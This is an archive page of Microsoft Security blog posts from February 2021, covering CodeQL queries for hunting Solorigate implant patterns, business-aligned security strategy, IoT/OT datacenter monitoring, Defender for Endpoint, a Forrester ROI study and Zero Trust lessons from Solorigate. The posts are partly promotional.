Archive for the ‘cybersecurity’ Category

Microsoft open sources CodeQL queries used to hunt for Solorigate activity

February 25th, 2021 No comments

A key aspect of the Solorigate attack is the supply chain compromise that allowed the attacker to modify binaries in SolarWinds’ Orion product. These modified binaries were distributed via previously legitimate update channels and allowed the attacker to remotely perform malicious activities, such as credential theft, privilege escalation, and lateral movement, to steal sensitive information. The incident has reminded organizations to reflect not just on their readiness to respond to sophisticated attacks, but also the resilience of their own codebases.

Microsoft believes in leading with transparency and sharing intelligence with the community for the betterment of security practices and posture across the industry as a whole. In this blog, we’ll share our journey in reviewing our codebases, highlighting one specific technique: the use of CodeQL queries to analyze our source code at scale and rule out the presence of the code-level indicators of compromise (IoCs) and coding patterns associated with Solorigate. We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries we cover in this blog simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality. Both can occur coincidentally in benign code, so all findings will need review to determine if they are actionable. Additionally, there is no guarantee that the malicious actor is constrained to the same functionality or coding style in other operations, so these queries may not detect other implants that deviate significantly from the tactics seen in the Solorigate implant. These should be considered as just a part in a mosaic of techniques to audit for compromise.

Microsoft has long had integrity controls in place to verify that the final compiled binaries distributed to our servers and to our customers have not been maliciously modified at any point in the development and release cycle. For example, we verify that the source file hashes generated by the compiler match the original source files. Still, at Microsoft, we live by the “assume breach” philosophy, which tells us that regardless of how diligent and expansive our security practices are, potential adversaries can be equally as clever and resourced. As part of the Solorigate investigation, we used both automated and manual techniques to validate the integrity of our source code, build environments, and production binaries and environments.

Microsoft’s contribution during Solorigate investigations reflects our commitment to a community-based sharing vision described in Githubification of InfoSec. In keeping with our vision to grow defender knowledge and speed community response to sophisticated threats, Microsoft teams have openly and transparently shared indicators of compromise, detailed attack analysis and MITRE ATT&CK techniques, advanced hunting queries, incident response guidance, and risk assessment workbooks during this incident. Microsoft encourages other security organizations that share the “Githubification” vision to open source their own threat knowledge and defender techniques to accelerate defender insight and analysis. As we have shared before, we have compiled a comprehensive resource for technical details of the attack, indicators of compromise, and product guidance at As part of Microsoft’s sweeping investigation into Solorigate, we reviewed our own environment. As we previously shared, these investigations found activity with a small number of internal accounts, and some accounts had been used to view source code, but we found no evidence of any modification to source code, build infrastructure, compiled binaries, or production environments.

A primer on CodeQL and how Microsoft utilizes it

CodeQL is a powerful semantic code analysis engine that is now part of GitHub. Unlike many analysis solutions, it works in two distinct stages. First, as part of the compilation of source code into binaries, CodeQL builds a database that captures the model of the compiling code. For interpreted languages, it parses the source and builds its own abstract syntax tree model, as there is no compiler. Second, once constructed, this database can be queried repeatedly like any other database. The CodeQL language is purpose-built to enable the easy selection of complex code conditions from the database.

One of the reasons we find so much utility from CodeQL at Microsoft is specifically because this two-stage approach unlocks many useful scenarios, including being able to use static analysis not just for proactive Secure Development Lifecycle analysis but also for reactive code inspection across the enterprise. We aggregate the CodeQL databases produced by the various build systems or pipelines across Microsoft to a centralized infrastructure where we have the capability to query across the breadth of CodeQL databases at once. Aggregating CodeQL databases allows us to search semantically across our multitude of codebases and look for code conditions that may span between multiple assemblies, libraries, or modules based on the specific code that was part of a build. We built this capability to analyze thousands of repositories for newly described variants of vulnerabilities within hours of the variant being described, but it also allowed us to do a first-pass investigation for Solorigate implant patterns similarly, quickly.

We are open sourcing several of the C# queries that assess for these code-level IoCs, and they can currently be found in the CodeQL GitHub repository. The within that repo contains detailed descriptions of each query and what code-level IoCs each one is attempting to find. It also contains guidance for other query authors on making adjustments to those queries or authoring queries that take a different tactic in finding the patterns.

GitHub will shortly publish guidance on how they are deploying these queries for existing CodeQL customers. As a reminder, CodeQL is free for open-source projects hosted by GitHub.

Our approach to finding code-level IoCs with CodeQL queries

We used two different tactics when looking for code-level Solorigate IoCs. One approach looks for particular syntax that stood out in the Solorigate code-level IoCs; the other approach looks for overall semantic patterns for the techniques present in the code-level IoCs.

The syntactic queries are very quick to write and execute while offering several advantages over comparable regular expression searches; however, they are brittle to the malicious actor changing the names and literals they use. The semantic patterns look for the overall techniques used in the implant, such as hashing process names, time delays before contacting the C2 servers, etc. These are durable to substantial variation, but they are more complicated to author and more compute-intensive when analyzing many codebases at once.

Sample technique from implant with corresponding CodeQL query

By combining these two approaches, the queries are able to detect scenarios where the malicious actor changed techniques but used similar syntax, or changed syntax but employed similar techniques. Because it’s possible that the malicious actor could change both syntax and techniques, CodeQL was but one part of our larger investigative effort.

Next steps with CodeQL

The queries we shared in this blog and described in target patterns specifically associated with the Solorigate code-level IoCs, but CodeQL also provides many other options to query for backdoor functionality and detection-evasion techniques.

These queries were relatively quick to author, and we were able to hunt for patterns much more accurately across our CodeQL databases and with far less effort to manually review the findings, compared to using text searches of source code. CodeQL is a powerful developer tool, and our hope is that this post inspires organizations to explore how it can be used to improve reactive security response and act as a compromise detection tool.

In future blog posts, we’ll share more ways that Microsoft uses CodeQL. We’ll also continue open-sourcing queries and utilities that build upon CodeQL so that others may benefit from them and further build upon them.

The post Microsoft open sources CodeQL queries used to hunt for Solorigate activity appeared first on Microsoft Security.

Becoming resilient by understanding cybersecurity risks: Part 3—a security pro’s perspective

February 24th, 2021 No comments

In part two of this blog series on aligning security with business objectives and risk, we explored the importance of thinking and acting holistically, using the example of human-operated ransomware, which threatens every organization in every industry. As we exited 2020, the Solorigate attack highlighted how attackers are continuously evolving. These nation-state threat actors used an organization’s software supply chain against them, with the attackers compromising legitimate software and applications with malware that installed into target organizations.

In part three of this series, we will further explore what it takes for security leaders to pivot their program from looking at their mission as purely defending against technical attacks to one that focuses on protecting valuable business assets, data, and applications. This pivot will enable business and cybersecurity leaders to remain better aligned and more resilient to a broader spectrum of attack vectors and attacker motivations.

What problem do we face?

First, let’s set a quick baseline on the characteristics of human-operated cyberattacks.

This diagram depicts commonalities and differences between for-profit ransomware and espionage campaigns:

diagram showing commonalities and differences between for-profit ransomware and espionage campaigns

Figure 1: Comparison of human-operated attack campaigns.

Typically, the attackers are:

  • Flexible: Utilize more than one attack vector to gain entry to the network.
  • Objective driven: Achieve a defined purpose from accessing your environment. This could be specific to your people, data, or applications, but you may also just fit a class of targets like “a profitable company that is likely to pay to restore access to their data and systems.”
  • Stealthy: Take precautions to remove evidence or obfuscate their tracks (though at different investment and priority levels, see figure one)
  • Patient: Take time to perform reconnaissance to understand the infrastructure and business environment.
  • Well-resourced and skilled in the technologies they are targeting (though the depth of skill can vary).
  • Experienced: They use established techniques and tools to gain elevated privileges to access or control different aspects of the estate (which grants them the privileges they need to fulfill their objective).

There are variations in the attack style depending on the motivation and objective, but the core methodology is the same. In some ways, this is analogous to the difference between a modern electric car versus a “Mad Max” style vehicle assembled from whatever spare parts were readily and cheaply available.

What to do about it?

Because human attackers are adaptable, a static technology-focused strategy won’t provide the flexibility and agility you need to keep up with (and get ahead of) these attacks. Historically, cybersecurity has tended to focus on the infrastructure, networks, and devices—without necessarily understanding how these technical elements correlate to business objectives and risk.

By understanding the value of information as a business asset, we can take concerted action to prevent compromise and limit risk exposure. Take email, for example, every employee in the company typically uses it, and the majority of communications have limited value to attackers. However, it also contains potentially highly sensitive and legally privileged information (which is why email is often the ultimate target of many sophisticated attacks). Categorizing email through only a technical lens would incorrectly categorize email as either a high-value asset (correct for those few very important items, but impossible to scale) or a low-value asset (correct for most items, but misses the “crown” jewels in email).

Business-centric security.

Figure 2: Business-centric security.

Security leaders must step back from the technical lens, learn what assets and data are important to business leaders, and prioritize how teams spend their time, attention, and budget through the lens of business importance. The technical lens will be re-applied as the security, and IT teams work through solutions, but looking at this only as a technology problem runs a high risk of solving the wrong problems.

It is a journey to fully understand how business value translates to technical assets, but it’s critical to get started and make this a top priority to end the eternal game of ‘whack-a-mole’ that security plays today.

Security leaders should focus on enabling this transformation by:

  1. Aligning the business in a two-way relationship:
  • Communicate in their language: explain security threats in business-friendly language and terminology that helps to quantify the risk and impact to the overall business strategy and mission.
  • Participate in active listening and learning: talk to people across the business to understand the important business services and information and the impact if that were compromised or breached. This will provide clear insight into prioritizing the investment in policies, standards, training, and security controls.
  1. Translating learnings about business priorities and risks into concrete and sustainable actions:
  • Short term focus on dealing with burning priorities:
    • Protecting critical assets and high-value information with appropriate security controls (that increases security while enabling business productivity)
    • Focus on immediate and emerging threats that are most likely to cause business impact.
    • Monitoring changes in business strategies and initiatives to stay in alignment.
  • Long term set direction and priorities to make steady progress over time, to improve overall security posture:
    • Zero Trust: Create a clear vision, strategy, plan, and architecture for reducing risks in your organization aligned to the zero trust principles of assuming breach, least privilege, and explicit verification. Adopting these principles shifts from static controls to more dynamic risk-based decisions that are based on real-time detections of anomalous behavior irrespective of where the threat derived.
    • Burndown technical debt as a consistent strategy by operating security best practices across the organization such as replacing password-based authentication with passwordless and multi-factor authentication (MFA), applying security patches, and retiring (or isolating) legacy systems. Just like paying off a mortgage, you need to make steady payments to realize the full benefit and value of your investments.
    • Apply data classifications, sensitivity labels, and role-based access controls to protect data from loss or compromise throughout its lifecycle. While these can’t completely capture the dynamic nature and richness of business context and insight, they are key enablers to guide information protection and governance, limiting the potential impact of an attack.
  1. Establishing a healthy security culture by explicitly practicing, communicating, and publicly modeling the right behavior. The culture should focus on open collaboration between business, IT, and security colleagues and applying a ‘growth mindset’ of continuous learning. Culture changes should be focused on removing siloes from security, IT, and the larger business organization to achieve greater knowledge sharing and resilience levels.

You can read more on Microsoft’s recommendations for security strategy and culture here.

In the next blog of the series, we will explore the most common attack vectors, how and why they work so effectively, and the strategies to mitigate evolving cybersecurity threats.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Becoming resilient by understanding cybersecurity risks: Part 3—a security pro’s perspective appeared first on Microsoft Security.

Microsoft listed as a Representative Vendor in 2020 Gartner Market Guide for Insider Risk Management Solutions

February 23rd, 2021 No comments

While organizations have long prioritized external cybersecurity risks, many have not paid enough attention to the risks posed by trusted insiders in their organizations. This is a mistake. Insiders often already have access to sensitive data, and the risks, whether malicious or inadvertent, can potentially cause greater damage than external cybersecurity risks.

Two years ago, after a conversation with our Chief Information Security Officer (CISO), Bret Arsenault, we embarked upon an incredible journey developing Insider Risk Management in Microsoft 365, which organizations could use to identify and manage insider risks.

In recognition of these investments, I am announcing that Gartner has listed Microsoft as a Representative Vendor in the 2020 Market Guide for Insider Risk Management Solutions. To us, this recognition reinforces our leadership in delivering an innovative solution that allows organizations to quickly identify and collaboratively manage insider risks while maintaining employee privacy.

According to Gartner, “security and risk management leaders need an insider threat mitigation program that is composed of people, processes and technology.”

A few learnings from the report:

  • The number of incidents has increased by a staggering 47 percent in just two years, from 3,200 in 2018 to 4,700 in 2020.
  • Organizations impacted by insider threats spent an average of $11.45 million in 2020—up 31 percent from $8.76 million in 2018.
  • More than 60 percent of reported insider threat incidents were the result of a careless employee or contractor, and 23 percent were caused by malicious insiders.

We continue to work closely with our customers to gather feedback to help us build better products. Your input provides critical insights as we strive to enrich our Insider Risk Management solution to help you on your journey in identifying and managing insider risks.

For more details about our information archiving solution, visit our website. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Gartner, Market Guide for Insider Risk Management Solutions, 29 December 2020, Jonathan Care, Brent Predovich, Paul Furtado.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Microsoft listed as a Representative Vendor in 2020 Gartner Market Guide for Insider Risk Management Solutions appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Securing Azure datacenters with continuous IoT/OT monitoring

February 22nd, 2021 No comments

Real people. IT professionals build and maintain the LinkedIn server farm which operates on 100% renewable energy. Power is hydro-generated and managed efficiently on-site with minimum new draw from external grid. State-of-the-art facility uses eco-friendly solutions such as using reclaimed water to cool the data center.

Figure 1: Industrial cooling system for datacenters.

As more intelligent devices and machinery become connected to the internet, Operational Technology (OT) and the Internet of Things (IoT) have become part of your enterprise network infrastructure—and a growing security risk. With every new factory sensor, wind turbine monitoring device, or smart building, the attack surface grows. Analysts estimate that there will be 37 billion industrial IoT (IIoT) devices by 2025. Even more alarming for business leaders, Gartner predicts that 75 percent of CEOs will be personally liable for cyber-physical incidents by 2024.

We’ve spent 15 to 20 years adding layers of telemetry and monitoring for IT security. However, most chief information security officers (CISOs) and security operations center (SOC) teams have little or no visibility into their OT risk. It’s clear that a new approach is needed, one that includes IoT and OT-specific incident response and best practices for bringing the two teams together to defend against increasingly sophisticated cyber threats.

A changing threat landscape

In every area of our lives, cyber-physical systems (CPS) go mostly unseen as they quietly monitor building automation, industrial robots, gas pipelines, HVAC systems, turbines, automated warehousing and logistics systems, and other industrial systems. In the past, OT risk was minimized because of “air-gapping” meaning, a physical divide was maintained between OT and IT networks. But digital transformation has disrupted all that. Now devices in the warehouse, refinery, and factory floor are connected directly to corporate IT networks and often to the internet.

Microsoft offers end-to-end IoT security solutions for new, or “greenfield,” IoT deployments, but most of today’s IoT and OT devices are still considered “unmanaged” because they’re not provisioned, tracked in a configuration management database (CMDB), or consistently monitored. These devices typically don’t support agents and lack built-in security such as strong credentials and automated patching—making them soft targets for adversaries looking to pivot deeper into corporate networks.

For OT security, the key priorities are safety and availability. Production facilities need to be up and running to keep generating revenue. However, beyond revenue losses, there’s a risk for catastrophic damage and possible loss of life when OT systems are breached. And like IT attacks, an OT breach also poses a risk for theft of intellectual property (IP). According to the Verizon Data Breach Investigations Report (DBIR), manufacturers are eight times more likely to be breached for theft of IP. OT security translates directly into three main types of business risks:

  • Revenue impact: In 2017, WannaCry malware shut down major automotive manufacturers and affected more than 200,000 computers across 150 countries, with damages ranging into billions of dollars. The same year, NotPetya ransomware nearly shut down the mighty Maersk shipping company and several CPG companies. The attack crippled Merck’s production facilities resulting in losses of $1.3 billion. Last year, LockerGoga shut down the systems of Norwegian aluminum manufacturing company Norsk Hydro and several other plants. In 2020, Ekans (snake spelled backward) ransomware became the latest OT threat by specifically shutting down industrial control systems (ICS).
  • IP theft: IP includes proprietary manufacturing processes, formulas, designs, and more. In one instance, Microsoft Security Response Center (MSRC) discovered hackers were compromising vulnerable IoT devices using their default credentials. Once inside, the hackers scanned the network to see what other systems they could access to get sensitive IP. One in five North American-based corporations reports that they have had IPs stolen within the last year.
  • Safety risks: The Triton attack on a petrochemical facility targeted safety controllers with the intent to cause major structural damage and possible loss of life. The attackers gained a foothold in the IT network then used living-off-the-land (LOTL) tactics to gain remote access to the OT network, where they deployed their purpose-built malware. As this attack demonstrated, increased connectivity between IT and OT networks gives adversaries new avenues of attack for compromising unmanaged OT devices.

The U.S. Cybersecurity and Infrastructure Agency (CISA) reports that adversaries are still using many of the tactics seen in the Triton cyberattack to compromise embedded devices in OT systems. CISA has issued three basic recommendations for securing OT:

  1. Create an up-to-date, detailed inventory and map of your OT network.
  2. Use the asset inventory or map to prioritize risks, such as unpatched systems, unauthorized connections between subnets, or unauthorized connections to the internet.
  3. Implement continuous monitoring with anomaly detection.

Azure datacenters—a strategic resource

Through our cloud, Microsoft serves more than a billion customers and more than 20 million businesses across 60 regions worldwide. Today we help secure more than 400,000 customers across 120 countries. These range from small businesses to large enterprises, with 90 of the Fortune 100 using four or more of our security, compliance, identity, and management solutions. Our SOCs process 8 trillion global signals daily. Datacenters are the building blocks of the Cloud, and Microsoft has been building datacenters for more than 30 years. Microsoft datacenters constitute a complex industrial-scale facility sitting at the intersection of operational technologies (OT) and information technologies (IT). This includes industrial control systems managing the climate, power and water, physical security systems, diverse MS and non-MS personnel managing the servers and equipment, various networks including LAN and WAN and WiFi, and diverse software tools. Exclusively leveraging IT security solutions is insufficient to secure datacenters because OT systems have a long lifespan, implement network segregation, rely on proprietary protocols, and patching can disrupt operations leading to safety risks.

Infographic showing details about Microsoft datacenters around the world

Figure 2: Microsoft datacenters.

The biggest risks in securing complex heterogeneous datacenter environments and generations are lack of visibility into the full datacenter stack, and IR plans and playbooks across OT and IT. To address this, we have implemented an end-to-end security monitoring system using Azure Defender for IoT and Azure Sentinel while integrating with Microsoft’s central SOC.

To strengthen its data centers’ operational resiliency worldwide, Microsoft’s Azure data center security team selected CyberX’s purpose-built IoT and OT cybersecurity platform in mid-2019. Microsoft subsequently acquired CyberX in June 2020 and recently released Azure Defender for IoT, which is based on CyberX’s agentless security platform.

Incorporating IoT and OT-aware behavioral analytics and threat intelligence, Azure Defender for IoT delivers continuous IoT and OT asset discovery, vulnerability management, and threat detection. As a Network Detection and Response (NDR) platform that uses passive monitoring and Network Traffic Analysis (NTA), it has zero performance impact on the OT network.

Azure Defender for IoT is now deeply integrated with Azure Sentinel and is available for on-premises, Azure-connected, and hybrid environments. By using both Azure Defender for IoT and Azure Sentinel as a unified, end-to-end IT and OT security solution, the Azure datacenter security team has been able to reduce complexity and prevent gaps that can lead to vulnerabilities.

Microsoft datacenters: Ingestion, detection, and investigation.

Figure 3: Microsoft datacenters: Ingestion, detection, and investigation.

How it works

Azure Sentinel processes alert both from IT and OT, including from Azure Defender for IoT for OT devices such as HMIs, PLCs, biometrics, and badge readers and IT devices such as physical hosts, firewalls, virtual machines, routers, and more. All information is integrated with our incident-response system and our central SOC (including OT and IT playbooks) where machine learning reduces false positives and makes our alerts richer—creating a feedback loop with Azure Sentinel, which further refines and improves our alerting capabilities.

Microsoft datacenter security monitoring and response:

  • Improves the quality of critical environment inventory for risk-based analysis.
  • Correlates significant security events across multiple sources.
  • Advances detections across industrial control system (ICS) networks for known malware, botnet, and command/control traffic.
  • Enables machine learning support for insider threat-detection via user and entity behavior analytics (UEBA).
  • Deploys OT and IT incident-response playbooks using Azure Logic Apps integrated with Microsoft SOC. For example, we implement OT and IT playbooks for scenarios like ransomware or malware, botnet, insider threat, and untracked data-bearing devices.
  • Detects anomalous activity while reducing noise.

In addition, the Microsoft cloud security stack—Microsoft Threat Intel Center (MSTIC) is being expanded with OT capabilities and threat intel.

OT and IT: Bridging the cultural divide

OT and IT have traditionally worked on separate sides of the air gap as laid out in the Purdue Model. But as I mentioned at the top, that physical divide has vanished into the cloud. Thinking in terms of an IT and OT persona that enables both teams to collaborate seamlessly is the security challenge for our time. Here are a few insights that can help bridge the gap:

  • Mature and boost IT security practices for OT: Patching an OT system isn’t the same as updating IT; there can be dangerous repercussions in the form of factory downtime or safety risks. Empathy is important; the liberties enjoyed in the IT world can’t be blindly applied on OT. However, don’t throw away IT security best practices—boost them with OT capabilities.
  • Embrace the security journey: Whether you’re in OT or IT, security improvements move like a dial, not a switch. Agree on your guiding principles and tenants, then constantly improving collaboration between OT and IT teams.
  • Understand the OT persona: IT teams should get to know what a day in the life of an OT person looks like. Our team shadowed OT activity by making site visits, which helped build understanding and establish working relationships.
  • Appreciate the other team’s priorities: When working with OT, this means understanding the importance of safety and availability. What might be a simple system patch in IT could cause downtime or a safety issue in OT. Establish a common vocabulary and metrics to work out issues together.
  • Acknowledge preconceptions: OT often feels like the IT security approach will cause disruptions and downtime, leading to audits, escalations, or worse. For that reason, our approach became: “Hey, we found a problem. Let’s solve it together.”
  • Be proactive versus reactive: Do security assessments together and keep the right people in the loop. Set up two-way trainings, such as joint tabletop or red team exercises, and plan for “worst day” scenarios. Create dedicated websites and SharePoint sites where people can reach out with confidence that their concerns will be addressed.

For more information on securing smart buildings and bridging the IT and OT gap, watch my SANS webinar presentation titled “Securing Building Automation & Data Centers with Continuous OT Security Monitoring.”

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Securing Azure datacenters with continuous IoT/OT monitoring appeared first on Microsoft Security.

What we like about Microsoft Defender for Endpoint

February 22nd, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA 

It’s no secret that the security industry generally likes Microsoft Defender for Endpoint. After a few months of using and integrating it with our platform here at Expel, we feel the same.

On Expel’s EXE Blog, we regularly share our thought process on how we think about security operations at scale at Expel and the decision support (or additional context) we provide our analysts through automation.

In short, Defender for Endpoint makes it easy for us to achieve our standard of investigative quality and response time, but it doesn’t require a heavy lift from our analysts. And that’s good news both for our customers and for us.

So, what is Microsoft Defender for Endpoint?

Defender for Endpoint is an enterprise endpoint security product that supports Mac, Linux, and Windows operating systems, along with Android and iOS. There are lots of cool things that Defender for Endpoint does at an administrative level (such as attack surface reduction and configurable remediation). However, from our vantage point, we know it best for its detection and response capabilities.

Defender for Endpoint is unique because not only does it combine an Endpoint Detection and Response (EDR) and AV detection engine into the same product, but for Windows 10 hosts, this functionality is built into the operating system, removing the need to install an endpoint agent.

With an appropriate Microsoft license, Defender for Endpoint and Windows 10 provide out-of-the-box protection without the need to mass-deploy software or provision sensors across your fleet.

How EDR tools help us as an XDR vendor

When we integrate with an EDR product like Defender for Endpoint in support of our customers, our goal is to predict the investigative questions that an analyst will ask and then automate the action of getting the necessary data from that tool.

This frees up our analysts to make the decision—versus making them spend time extracting the right data.

We think Defender for Endpoint provides the right toolset that helps us reach that goal—and removes some burden from our analysts—thanks to its APIs.

Thanks to Defender for Endpoint’s robust APIs, we augmented its capability to provide upfront decision support to our analysts. As a result, we’re able to arm them with the answers to the basic investigative questions we ask ourselves with every alert.

To find these answers, there are a few specific capabilities of Defender for Endpoint we use that allow us to pull this information into each alert:

  • Advanced hunting database.
  • Prevalence information.
  • Detailed process logging.
  • AV actions.

This way, our analysts don’t need to worry about fiddling with the tool but instead focus on analyzing the rich data it provides.

Check out a real-life example of how Expel analysts use Defender for Endpoint to triage an alert on behalf of a customer.

Defender for Endpoint helps reduce our alert-to-fix time

The decision support—or additional context about an alert—that Defender for Endpoint enables us to generate is powerful because it allows us to become specialists at analysis rather than specialists of a specific technology.

Defender for Endpoint provides a platform that allows our analysts to quickly and accurately answer important questions during an investigation.

Most importantly, though, having these capabilities emulated in the API allowed us to build on top of the Defender for Endpoint platform to be more efficient in providing high-quality detection and response.

And that’s a win-win for both Expel and our customers.

Learn more

To learn more about Expel, visit our listing on the Azure Marketplace.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website, where you can learn about the MISA program, product integrations and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post What we like about Microsoft Defender for Endpoint appeared first on Microsoft Security.

Forrester Consulting TEI Study: Azure Security Center delivers 219 percent ROI over 3 years and a payback of less than 6 months

February 18th, 2021 No comments

Azure Security Center is a critical tool to secure our multi-cloud workloads in the new world of remote work we find ourselves in today. We are excited to share that Forrester Consulting has just conducted a commissioned Total Economic Impact™ (TEI) study on behalf of Microsoft, which involved interviewing existing customers to create an accessible framework for organizations to evaluate the financial impact of Azure Security Center. The results are big—Azure Security Center delivers 219 percent return on investment (ROI) over three years and a payback of less than six months; reduces the risk of a cloud security breach by up to 25 percent, reduces time to threat mitigation by 50 percent, and reduces the cost of third-party security tools and services from consolidation by over $200,000 annually.

The Forrester study concluded that Azure Security Center reduces threat protection costs at scale, simplifies security posture management, and improves the efficiency and effectiveness of the Security Operations Center (SOC).

Forrester found that a composite organization experienced benefits of $3.56 million over three years versus costs of $1.1 million. This adds up to an ROI of 219 percent with payback in less than six months.

Cost Savings

Prior to using Azure Security Center, the customers were relying on multiple third-party cloud security tools implemented in different organizational siloes to understand their security posture and defend against potential threats. However, the distributed and disintegrated nature of this approach introduced inefficiencies into security workflows, produced a plethora of false-positive threat alerts, and limited visibility of the organization’s overall security posture, leading to potential security risk.

After the investment in Azure Security Center, the customers’ visibility into the security posture of their Azure workloads increased substantially, reducing the risk of cloud security breaches while also improving the productivity of security teams responsible for threat detection and remediation and security policy and regulatory compliance.

Forrester found that an organization experienced benefits of $3.56 million over three years versus costs of $1.1 million. This adds up to an ROI of 219 percent with payback in less than six months.

“We thought that if we could replace third-party tools with integrated Azure functionality, it might improve visibility. It might catch additional threats. It might ease configuration work, reducing management overhead in the end.”—IT security manager, professional services ¹

Reducing risk factors and time to respond

Forrester interviewed four customers with experience using Azure Security Center and aggregated the experiences of the interviewed customers, and combined the results into a single composite organization. This framework helps identify the cost, benefit, flexibility, and risk factors that affect the investment decision. According to aggregated data, Azure Security Center demonstrated strong benefits such as:

  • Reduced risk of a cloud security breach by up to 25 percent. By improving visibility into an organization’s security posture across all its Azure workloads and decreasing time to threat remediation, interviewed organizations shared that they were able to reduce the risk of cloud security breaches.
  • Reduced time to threat mitigation by 50 percent. Organizations that chose to also deploy Azure Defender within Azure Security Center shared that they were able to decrease their mean time to threat remediation by 50 percent. They were also able to reduce the number of threats needing remediation by 86 percent, thanks to false-positive threat alert reduction. Customers also benefitted from the fact that Microsoft’s scale and telemetry data enables Azure Security Center to update security recommendations and notify of important threats at speed.
  • Reduction in time spent on security policy and compliance management up to 30 percent. Azure Security Center also reduced the amount of time spent on updating security policies and on compliance-related workflows by between 20 percent and 30 percent. This resulted in the improved productivity of security administrators.
  • Reduced cost of third-party security tools and services from consolidation by over $200,000 annually. Customers shared that they reduced their spending and reliance on third-party security tools and services. Customers saved 20 percent to 30 percent on third-party security tools, reduced third-party security services by $180,000, and reduced third-party penetration test services by 50 percent.
  • Reduced risk of non-compliance. Customers improved their compliance posture with the added visibility and accessibility of regulatory compliance status through Azure Security Center. They were also able to make recommended fixes to improve compliance they might have otherwise missed.

“Whenever we got a vulnerability report, we’d have a hard time hunting down who was responsible to make sure they would remediate the issue. With Azure Security Center, our teams have full visibility into vulnerabilities, and the recommendations that are applicable to them.”—Cloud Security Specialist, Retail ¹

Protect your hybrid cloud workloads today

You can start monitoring your security posture for free using Azure Security Center today. Microsoft recommends protecting all your hybrid cloud workloads with Azure Defender. You can try Azure Defender free for 30 days. Then pay as you go for the workload protection you choose.

Download the full Forrester Consulting study, The Total Economic Impact™ of Azure Security Center. Get started and learn more about Azure Security Center and Azure Defender. To develop a proof of concept study, please visit our POC guide.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

¹ Customer quotes shared in this blog are anonymous as they are part of the Forrester Consulting Total Economic Impact™ of Azure Security Center study.

The post Forrester Consulting TEI Study: Azure Security Center delivers 219 percent ROI over 3 years and a payback of less than 6 months appeared first on Microsoft Security.

Categories: Azure Security, cybersecurity Tags:

Turning the page on Solorigate and opening the next chapter for the security community

February 18th, 2021 No comments

The recent Solar Winds attack is a moment of reckoning. Today, as we close our own internal investigation of the incident, we continue to see an urgent opportunity for defenders everywhere to unify and protect the world in a more concerted way. We also see an opportunity for every company to adopt a Zero Trust plan to help defend against future attacks. 

The Microsoft Security Research Center (MSRC), which has shared learnings and guidance throughout the Solorigate incident, confirmed today that following the completion of our internal investigation we’ve seen no evidence that Microsoft systems were used to attack others. There was also no evidence of access to our production services or customer data.  

However, a concerning aspect of this attack is that security companies were a clear target. Microsoft, given the expansive use of our productivity tools and leadership in security, of course was an early target. 

But while this highly-sophisticated nation state actor was able to breach the gate, they were met by unified team of human and digital defenders. There are several reasons why we were able to limit the scope and impact of this incident for our company, customers, and partners, but ultimately, they all boil down to a few fundamental ways we approach security.  

We believe these approaches represent an opportunity for all IT and security teams as we collectively navigate a rapidly evolving and sophisticated threat landscape 

Adopt a Zero Trust mindset

A key action is implementing a Zero Trust architectureIn this approach, companies must assume all activity—even by trusted users—could be an attempt to breach systems, and everything a company does should be designed around that assumption.  

Tguard against these pervasive threats, it’s recommended that organizations deploy zero-trust architecture and defense-in-depth protections, installing defenses like a layer cake across code, coding tools, email, cloud apps, endpoints, identities, the developer community, defender productseverything. 

Zero Trust is a proactive mindset. When every employee at a company assumes attackers are going to land at some point, they model threats and implement mitigations to ensure that any potential exploit can’t expand. The value of defense-in-depth is that security is built into key areas an actor might try to break, beginning at the code level and extending to all systems in an end-to-end way.  

Customer Guidance: As companies think about deploying a zero-trust posture and making a transition from implicit trust to explicit verification, the first step to consider is protecting identities, especially privileged user accounts. Gaps in protecting identities (or user credentials), like weak passwords or lack of multifactor authentication, are opportunities for an actor to find their way into a system, elevate their status, and move laterally across the environments targeting email, source code, critical databases and more. We witnessed this in Solorigate when abandoned app accounts with no multi-factor authentication were used to access cloud administrative settings with high privilege. To explore protecting privileged identity and access, companies should review our post on Securing privileged access overview | Microsoft Docs. 

Embrace the cloud

We were also reminded of the importance of cloud technology over on-premises software. Cloud technologies like Microsoft 365, Azure, and the additional premium layers of services available as part of these solutions, improve a defender’s ability to protect their own environment.  

Baseline layers of protection are not enough for today’s sophisticated threats. Defense strategies must match up to these increasingly sophisticated attacks while factoring in the complexities of securing a remote workforce. If you are not thinking about advanced layers of protection that can detectalert, prevent and respond to attacks across identities, email, cloud apps, and endpoints, you may be locking a door while leaving the window open. From Microsoft, consider technologies like Azure Active Directory and Microsoft 365 Defender. 

One of the most important pieces of guidance for any security posture that we can share right now is to layer up, no matter who your security vendors are. 

In addition, with the Microsoft cloud, customers benefit from industry-leading threat intelligence, powerful AI, machine learning, and defense-in-depth capabilities that most companies simply could not develop on their own. Our platform and services assess over eight trillion security signals every day, enabling Microsoft to take more of the work off a defender’s plate. Our technology can surface and correlate security alerts that could represent a larger issue or remediate issues on demand with our own threat experts. As an example, in 2020 over 30 billion email threats were blocked by Microsoft cloud technology. 

